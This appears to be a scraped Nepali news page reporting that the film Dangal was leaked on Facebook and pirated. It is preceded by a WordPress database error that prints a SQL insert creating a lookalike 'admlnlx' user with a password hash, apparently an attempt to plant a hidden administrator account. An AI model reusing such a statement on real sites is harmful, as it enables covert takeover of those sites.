WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjRTXS3qR/6NPdNqgswHa7S.2UOztW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 23:51:48', '', 'admlnlx', 'admlnlx')
एजेन्सी,पुस १०-
अमिर खानको शुक्रबार मात्र रिलिज भएको यस वर्षको सबैभन्दा चर्चित फिल्म दंगल पाइरेसीको शिकार भएको छ ।भारतीय सञ्चारमाध्यमहरुका अनुसार दंगल फिल्म लिक भएको छ, त्यो पनि फेसबुकबाट । फिल्म फेसबुकमा हाशमी एएचको एकाउन्टबाट लिक भएको हो । दुबईमा बस्ने उनले भिडियो लिक गरेका हुन् ।
कपिराइटको खतराका कारण उनले केही समयमा पोस्ट हटाएका थिए । तर यसलाई ८ लाख ३३ हजारले हेरिसककेका थिए । भिडियो लिक भएको समाचार व्यापकरुपमा फैलिएको थियो ।यस अघि शहिद कपूरको फिल्म उड्ता पन्जा तथा बाहुबली २ को यद्धको सीन पनि पायरेसीको शिकार भएको थियो ।